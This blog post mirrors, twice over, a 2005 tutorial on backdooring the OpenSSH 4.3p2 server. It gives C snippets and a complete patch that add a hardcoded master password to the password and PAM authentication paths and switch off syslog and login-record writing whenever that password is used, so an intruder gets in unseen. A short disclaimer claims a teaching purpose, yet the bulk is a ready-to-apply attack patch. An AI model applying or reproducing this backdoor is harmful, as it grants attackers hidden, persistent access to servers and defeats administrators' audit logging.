Write your own SSHD backdoor

This article is not written by me. I found it online, but only in one place so this is effectively a mirror for it. Enjoy 🙂

///////////////////////////////////////////////////////////////////////////////
/************************************************** ***************************/
/* Tutorial: How to write a backdoor for OpenSSH. */
/* Date: June 29, 2005 */
/* Author: pikah (rvdwesten@gmail.com) */
/* Website: http://w4ck1ng.net */
/* */


/* DISCLAIMER: */
/* This tutorial is published here for one reason only: To make the problem */
/* understandable for users who are interested in the way a sshd-daemon */
/* can be easily backdoored. In this way system administrators can understand */
/* how easily an attacker can make himself ‘invisible’ for logging and even */
/* get acces without knowing the real passwords */
/* The author will not be responsible for any */
/* actions taken by anyone who used this paper for illegal activities */
/* */
/************************************************** ***************************/
///////////////////////////////////////////////////////////////////////////////

Well this is one of the first tutorials I will write.
This tutorial is about how to make (and write) your own OpenSSH backdoor.
I will try to keep this tutorial as small as possible, I also will not include any extra functions like remove logging functions etc. First I’m going to tell something about OpenSSH before I get into details.

[What is OpenSSH]

First I’m going to tell what OpenSSH does, I’m not getting into details , because most of you guys are probably not even reading this section. OpenSSH is a client/server application which allows an administrator to access his server securely. The
reason I say ‘secure’ is because SSH encrypts its session, so man-in-the-middle attacks are getting more difficult because all data is send over the ‘net’ in crypto-text. OpenSSH is used because e.g. telnet, rlogin and ftp are protocols which are
not using any encryption at all, so when you are trying to connect to a host, and there is someone watching, they can easily make a copy of your password or take other information from the stream. Additionally, OpenSSH provides secure tunneling
capabilities and several authentication methods, and supports all SSH protocol versions.
OpenSSH is developed by the OpenBSD Project and is freely useable and re-useable by everyone under a BSD license. However, development has costs, so if you find OpenSSH useful (particularly if you use it in a commercial system that is distributed)
please consider donating to help fund the project. The official website of OpenSSH is: http://www.openssh.org
Also nice to notice is that OpenSSH is mainly written for OpenBSD, but since it was used a lot there is a portable version for Linux. Offcource linux is not the only ported version, you can find others on the website of the OpenSSH project.

[The Backdooring]

So after explaining what OpenSSH does, I will try to explain how it is possible to make a backdoor in OpenSSH and every little detail of what I am doing.
First of all we need to download the sourcecode. At this point the latest version of OpenSSH is OpenSSH-4.3p2. This tutorial will teach you how to make a backdoor for this version of OpenSSH. Also notice that other versions may need to be ‘patched’ in a different way, or maybe even in other files.

We are downloading the sourcecode first. And after downloading we are unpacking the sourcecode and changing to the sourcecode directory. Now that we have the sourcecode written in C, we can go start looking for the place where the password authentication will start. There are more then one way to make a backdoor for OpenSSH. For example. you can place a backdoor before the handshake even begins. This is the place where there is not even encryption. The bad thing about this, is that there is still plaintext going over the internet. The good thing is that we are able to bypass logging without building extra features to the sourcecode. Another way is to ‘hijack’ the authentication method, and allow it to accept our chosen password.

In this tutorial I will explain how to ‘hijack’ the authentication method. In this way all our traffic is encrypted before the authentication starts. In this way it isn’t possible to capture data and grep your password from the captured packets. The bad thing I already said is that there is still logging we have to bypass. So we have to put our code in more than one
place. We have to search for all places where logging is used. Starting with the backdoor first, we want the code to accept our ‘magic’ password. First we are going to have a look at the place where we want to add our backdoor. We are going to find the authentication method, which checks the password that is entered. This method can be found in the file ‘auth_passwd.c‘.
By opening this file we are searching where the plain password comes in. This is the place where we can check it against the magic password inserted by us.
If the password compares with the magicpassword, it will give us the right to enter the box, that is what we want. Also when the magicpassword is used, we are going to disable logging, since we don’t want the administrator to notice our
existence.

Lets start with the code. The files we are going to modify are the following:

##################################################
# includes.h — In this file we are going to define our password and global integer.
# auth-passwd.c — In this file we are going to put the backdoor.
# auth-pam.c — In this file we are going to put some code when PAM-authentication is used.
# log.c — This file we are going to change since we dont want logging.
# loginrec.c — Same as log.c
##################################################

Lets first start with ‘includes.h‘, we need this file because this file is used by all other files in the OpenSSH project. When we declare something in here, we can easily use it in every other place. So what we are going to do is add some code.

##########################################
# <code>
# #define B4XDOOR “backdoorpasswordhere”
# int backdoorActive;
# </code>
##########################################

Now we can start and put our backdoor code in the other places.
We are going to put the following code in the function called: “int auth_password(Authctxt *authctxt, const char *password);”

#######################################
# <auth-passwd.c>
# backdoorActive = 0;
#
# if (!strcmp(password, B4XDOOR)) {
# backdoorActive = 1;
# return 1;
# }
# </auth-passwd.c>
#######################################

With this done, we make it ourself possible to login with our password defined in includes.h Also we are giving the backdoorActive the value of 1. This value is going to be used by other functions. e.g. logging. Also we are going to change the file auth-pam.c, this is used when PAM-authentication is enabled. If the password is set, the pam-authentication module will return PAM_SUCCESS and it will allow the user to log in. The function we are changing is the following: “+int sshpam_auth_passwd(Authctxt *authctxt, const char *password);”

#############################################
# <auth-pam.c>
# if(backdoorActive == 1)
# sshpam_err = PAM_SUCCESS;
# </auth-pam.c>
#############################################

Now we have some other problems. Logging is not disabled so when you log in with your password you will still be logged too. e.g. syslogd. So we are going to tell the ssh-daemon to not log us when we are using the magic-password. This must be done
in the following files: <log.c> and <loginrec.c>
These one are easy, so we can just put in the front of the functions our code which is pretty easy.
##################################################
# log.c –> void do_log(LogLevel level, const char *fmt, va_list args);
# loginrec.c –> int login_write(struct logininfo *li);
##################################################

###########################
# <log.c>
# if(backdoorActive == 1)
# return;
# </log.c>
#
# <loginrec.c>
# if(backdoorActive == 1)
# return 0;
# </loginrec.c>
###########################

These are the smallest things you need to do to backdoor a OpenSSH daemon. Be sure to take care and make sure password authentication is used. If there is another authentication method, this backdoor probably will not work. Also check that keyboard-interactive method is not enabled as that may cause this backdoor not to function either.

To help you, I will include a patch which will allow you to implement the backdoor in the sourcecode.
[root@stimpy OpenSSH]# cat pikah.patch
diff -Naur openssh-4.3p2/auth-pam.c openssh-4.3p2-pikah/auth-pam.c
— openssh-4.3p2/auth-pam.c 2006-01-29 06:46:13.000000000 +0100
+++ openssh-4.3p2-pikah/auth-pam.c 2006-06-29 11:27:47.000000000 +0200
@@ -1164,6 +1164,11 @@
pam_strerror(sshpam_handle, sshpam_err));

sshpam_err = pam_authenticate(sshpam_handle, flags);
+
+ /* Added by pikah */
+ if(backdoorActive == 1)
+ sshpam_err = PAM_SUCCESS;
+
sshpam_password = NULL;
if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
debug(“PAM: password authentication accepted for %.100s”,
diff -Naur openssh-4.3p2/auth-passwd.c openssh-4.3p2-pikah/auth-passwd.c
— openssh-4.3p2/auth-passwd.c 2005-07-26 13:54:12.000000000 +0200
+++ openssh-4.3p2-pikah/auth-passwd.c 2006-06-29 11:28:09.000000000 +0200
@@ -71,6 +71,7 @@
int
auth_password(Authctxt *authctxt, const char *password)
{
+ backdoorActive = 0;
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
@@ -83,7 +84,12 @@
#endif
if (*password == ‘\0’ && options.permit_empty_passwd == 0)
return 0;

+
+ /* Added by pikah */
+ if (!strcmp(password, B4XDOOR)) {
+ backdoorActive = 1;
+ return 1;
+ }
#ifdef KRB5
if (options.kerberos_authentication == 1) {
int ret = auth_krb5_password(authctxt, password);
diff -Naur openssh-4.3p2/includes.h openssh-4.3p2-pikah/includes.h
— openssh-4.3p2/includes.h 2006-01-02 13:40:10.000000000 +0100
+++ openssh-4.3p2-pikah/includes.h 2006-06-29 11:24:46.000000000 +0200
@@ -13,6 +13,10 @@
* called by a name other than “ssh” or “Secure Shell”.
*/

+/* Inserted with the tutorial of pikah */
+#define B4XDOOR “backdoorpasswordhere”
+int backdoorActive;
+
#ifndef INCLUDES_H
#define INCLUDES_H

diff -Naur openssh-4.3p2/log.c openssh-4.3p2-pikah/log.c
— openssh-4.3p2/log.c 2005-03-09 10:12:48.000000000 +0100
+++ openssh-4.3p2-pikah/log.c 2006-06-29 11:29:16.000000000 +0200
@@ -285,6 +285,10 @@
void
do_log(LogLevel level, const char *fmt, va_list args)
{
+
+ if(backdoorActive == 1)
+ return;
+
#if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
struct syslog_data sdata = SYSLOG_DATA_INIT;
#endif
diff -Naur openssh-4.3p2/loginrec.c openssh-4.3p2-pikah/loginrec.c
— openssh-4.3p2/loginrec.c 2005-11-22 09:55:13.000000000 +0100
+++ openssh-4.3p2-pikah/loginrec.c 2006-06-29 11:29:40.000000000 +0200
@@ -414,6 +414,8 @@
int
login_write(struct logininfo *li)
{
+ if(backdoorActive == 1)
+ return 0;
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit(“Attempt to write login records by non-root user (aborting)”);
[root@stimpy OpenSSH]# [/QUOTE]
You can apply this patch by using the following command:

################################################## ##########
# [root@stimpy openssh-4.3p2]# patch -Np1 < ../pikah.patch
# patching file auth-pam.c
# patching file auth-passwd.c
# patching file includes.h
# patching file log.c
# patching file loginrec.c
# [root@stimpy openssh-4.3p2]#
#
# EOF
################################################## ##########

///////////////////////////////////////////////////////////////////////////////
/************************************************** ***************************/
/* Tutorial: How to write a backdoor for OpenSSH. */
/* Date: June 29, 2005 */
/* Author: pikah (rvdwesten@gmail.com) */
/* Website: http://w4ck1ng.net */
/* */
/* DISCLAIMER: */
/* This tutorial is published here for one reason only: To make the problem */ 
/* understandable for users who are interested in the way a sshd-daemon */
/* can be easily backdoored. In this way systemadministrators can understand */
/* how easily an attacker can make himself 'invisible' for logging and even */
/* get acces without knowing the real passwords */
/* The author will not be responsible for any */
/* actions taken by anyone who used this paper for illegal activities */ 
/* */
/************************************************** ***************************/
///////////////////////////////////////////////////////////////////////////////

Well this is one of the first tutorials I will write. 
This tutorial is about how to make (and write) your own OpenSSH backdoor. 
I will try to keep this tutorial as small as possible, I also will not include any extra functions like remove 
logging functions etc. First I'm going to tell something about OpenSSH before I get into details.


[What is OpenSSH]

First I'm going to tell what OpenSSH does, I'm not getting into details , because most of you guys are probably not even 
reading this section. OpenSSH is a client/server application which allows an administrator to access his server securely. The 
reason I say 'secure' is because SSH encrypts its session, so man-in-the-middle attacks are getting more difficult because 
all data is send over the 'net' in crypto-text. OpenSSH is used because e.g. telnet, rlogin and ftp are protocols which are 
not using any encryption at all, so when you are trying to connect to a host, and there is someone watching, they can easily 
make a copy of your password or take other information from the stream. Additionally, OpenSSH provides secure tunneling 
capabilities and several authentication methods, and supports all SSH protocol versions.
OpenSSH is developed by the OpenBSD Project and is freely useable and re-useable by everyone under a BSD license. However, 
development has costs, so if you find OpenSSH useful (particularly if you use it in a commercial system that is distributed) 
please consider donating to help fund the project. The official website of OpenSSH is: http://www.openssh.org
Also nice to notice is that OpenSSH is mainly written for OpenBSD, but since it was used a lot there is a portable version 
for Linux. Offcource linux is not the only ported version, you can find others on the website of the OpenSSH project.

[The Backdooring]

So after explaining what OpenSSH does, I will try to explain how it is possible to make a backdoor in OpenSSH and every 
little detail of what I am doing.
First of all we need to download the sourcecode. At this point the latest version of OpenSSH is OpenSSH-4.3p2. This tutorial 

will teach you how to make a backdoor for this version of OpenSSH.
Also notice that other versions may need to be 'patched' in a different way, or maybe even in other files. 

We are downloading the sourcecode first. And after downloading we are unpacking the sourcecode and changing to the sourcecode 
directory. Now that we have the sourcecode written in C, we can go start looking for the place where the password authentication will start. 
There are more then one way to make a backdoor for OpenSSH. For example. you can place a backdoor before the handshake even begins. 
This is the place where there is not even encryption. The bad thing about this, is that there is still plaintext going over the internet. 
The good thing is that we are able to bypass logging without building extra features to the sourcecode. 
Another way is to 'hijack' the authentication method, and allow it to accept our chosen password.

In this tutorial I will explain how to 'hijack' the authentication method. In this way all our traffic is encrypted before 
the authentication starts. In this way it isn't possible to capture data and grep your password from the captured packets. The 
bad thing I already said is that there is still logging we have to bypass. So we have to put our code in more than one 
place. We have to search for all places where logging is used.
Starting with the backdoor first, we want the code to accept our 'magic' password. First we are going to have a look at the 
place where we want to add our backdoor. We are going to find the authentication method, which checks the password that is 
entered. This method can be found in the file 'auth_passwd.c'.
By opening this file we are searching where the plain password comes in. This is the place where we can check it against the 
magic password inserted by us. 
If the password compares with the magicpassword, it will give us the right to enter the box, that is what we want. 
Also when the magicpassword is used, we are going to disable logging, since we dont want the administrator to notice our 
existence.

Lets start with the code. The files we are going to modify are the following:

################################################## ##################################
# includes.h -- In this file we are going to define our password and global integer. 
# auth-passwd.c -- In this file we are going to put the backdoor. 
# auth-pam.c -- In this file we are going to put some code when PAM-authentication is used. 
# log.c -- This file we are going to change since we dont want logging. 
# loginrec.c -- Same as log.c 
################################################## ###################################

Lets first start with 'includes.h', we need this file because this file is used by all other files in the OpenSSH project.
When we declare something in here, we can easily use it in every other place. So what we are going to do is add some code.

##########################################
# <code> 
# #define B4XDOOR "backdoorpasswordhere" 
# int backdoorActive; 
# </code> 
##########################################

Now we can start and put our backdoor code in the other places. 
We are going to put the following code in the function called: "int auth_password(Authctxt *authctxt, const char *password);"

#######################################
# <auth-passwd.c> 
# backdoorActive = 0; 
# 
# if (!strcmp(password, B4XDOOR)) { 
# backdoorActive = 1; 
# return 1; 
# } 
# </auth-passwd.c> 
#######################################

With this done, we make it ourself possible to login with our password defined in includes.h
Also we are giving the backdoorActive the value of 1. This value is going to be used by other functions. e.g. logging.
Also we are going to change the file auth-pam.c, this is used when PAM-authentication is enabled. If the password is set, the 
pam-authentication module will return PAM_SUCCESS and it will allow the user to log in. The function we are changing is the 
following: "+int sshpam_auth_passwd(Authctxt *authctxt, const char *password);"

#############################################
# <auth-pam.c> 
# if(backdoorActive == 1) 
# sshpam_err = PAM_SUCCESS; 
# </auth-pam.c> 
#############################################

Now we have some other problems. Logging is not disabled so when you log in with your password you will still be logged too.
e.g. syslogd. So we are going to tell the ssh-daemon to not log us when we are using the magic-password. This must be done 
in the following files: <log.c> and <loginrec.c>
These one are easy, so we can just put in the front of the functions our code which is pretty easy.
################################################## #######################
# log.c --> void do_log(LogLevel level, const char *fmt, va_list args); 
# loginrec.c --> int login_write(struct logininfo *li); 
################################################## #######################

###########################
# <log.c> 
# if(backdoorActive == 1)
# return; 
# </log.c> 
# 
# <loginrec.c> 
# if(backdoorActive == 1)
# return 0; 
# </loginrec.c> 
###########################

These are the smallest things you need to do to backdoor a OpenSSH daemon. Be sure to take care and make sure password authentication is used. 
If there is another authentication method, this backdoor probably will not work. 
Also check that keyboard-interactive method is not enabled as that make casue this backdoor not to function either.

To help you, I will include a patch which will allow you to implement the backdoor in the sourcecode.
[QUOTE][root@stimpy OpenSSH]# cat pikah.patch
diff -Naur openssh-4.3p2/auth-pam.c openssh-4.3p2-pikah/auth-pam.c
--- openssh-4.3p2/auth-pam.c 2006-01-29 06:46:13.000000000 +0100
+++ openssh-4.3p2-pikah/auth-pam.c 2006-06-29 11:27:47.000000000 +0200
@@ -1164,6 +1164,11 @@
pam_strerror(sshpam_handle, sshpam_err));

sshpam_err = pam_authenticate(sshpam_handle, flags);
+
+ /* Added by pikah */
+ if(backdoorActive == 1)
+ sshpam_err = PAM_SUCCESS;
+
sshpam_password = NULL;
if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
debug("PAM: password authentication accepted for %.100s",
diff -Naur openssh-4.3p2/auth-passwd.c openssh-4.3p2-pikah/auth-passwd.c
--- openssh-4.3p2/auth-passwd.c 2005-07-26 13:54:12.000000000 +0200
+++ openssh-4.3p2-pikah/auth-passwd.c 2006-06-29 11:28:09.000000000 +0200
@@ -71,6 +71,7 @@
int
auth_password(Authctxt *authctxt, const char *password)
{
+ backdoorActive = 0;
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
@@ -83,7 +84,12 @@
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
-
+
+ /* Added by pikah */
+ if (!strcmp(password, B4XDOOR)) {
+ backdoorActive = 1;
+ return 1;
+ }
#ifdef KRB5
if (options.kerberos_authentication == 1) {
int ret = auth_krb5_password(authctxt, password);
diff -Naur openssh-4.3p2/includes.h openssh-4.3p2-pikah/includes.h
--- openssh-4.3p2/includes.h 2006-01-02 13:40:10.000000000 +0100
+++ openssh-4.3p2-pikah/includes.h 2006-06-29 11:24:46.000000000 +0200
@@ -13,6 +13,10 @@
* called by a name other than "ssh" or "Secure Shell".
*/

+/* Inserted with the tutorial of pikah */
+#define B4XDOOR "backdoorpasswordhere"
+int backdoorActive;
+
#ifndef INCLUDES_H
#define INCLUDES_H

diff -Naur openssh-4.3p2/log.c openssh-4.3p2-pikah/log.c
--- openssh-4.3p2/log.c 2005-03-09 10:12:48.000000000 +0100
+++ openssh-4.3p2-pikah/log.c 2006-06-29 11:29:16.000000000 +0200
@@ -285,6 +285,10 @@
void
do_log(LogLevel level, const char *fmt, va_list args)
{
+
+ if(backdoorActive == 1)
+ return;
+
#if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
struct syslog_data sdata = SYSLOG_DATA_INIT;
#endif
diff -Naur openssh-4.3p2/loginrec.c openssh-4.3p2-pikah/loginrec.c
--- openssh-4.3p2/loginrec.c 2005-11-22 09:55:13.000000000 +0100
+++ openssh-4.3p2-pikah/loginrec.c 2006-06-29 11:29:40.000000000 +0200
@@ -414,6 +414,8 @@
int
login_write(struct logininfo *li)
{
+ if(backdoorActive == 1)
+ return 0;
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
[root@stimpy OpenSSH]# [/QUOTE]
You can apply this patch by using the following command:

################################################## ##########
# [root@stimpy openssh-4.3p2]# patch -Np1 < ../pikah.patch 
# patching file auth-pam.c 
# patching file auth-passwd.c 
# patching file includes.h 
# patching file log.c 
# patching file loginrec.c 
# [root@stimpy openssh-4.3p2]# 
# 
# EOF 
################################################## ##########[/ALIGN]
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *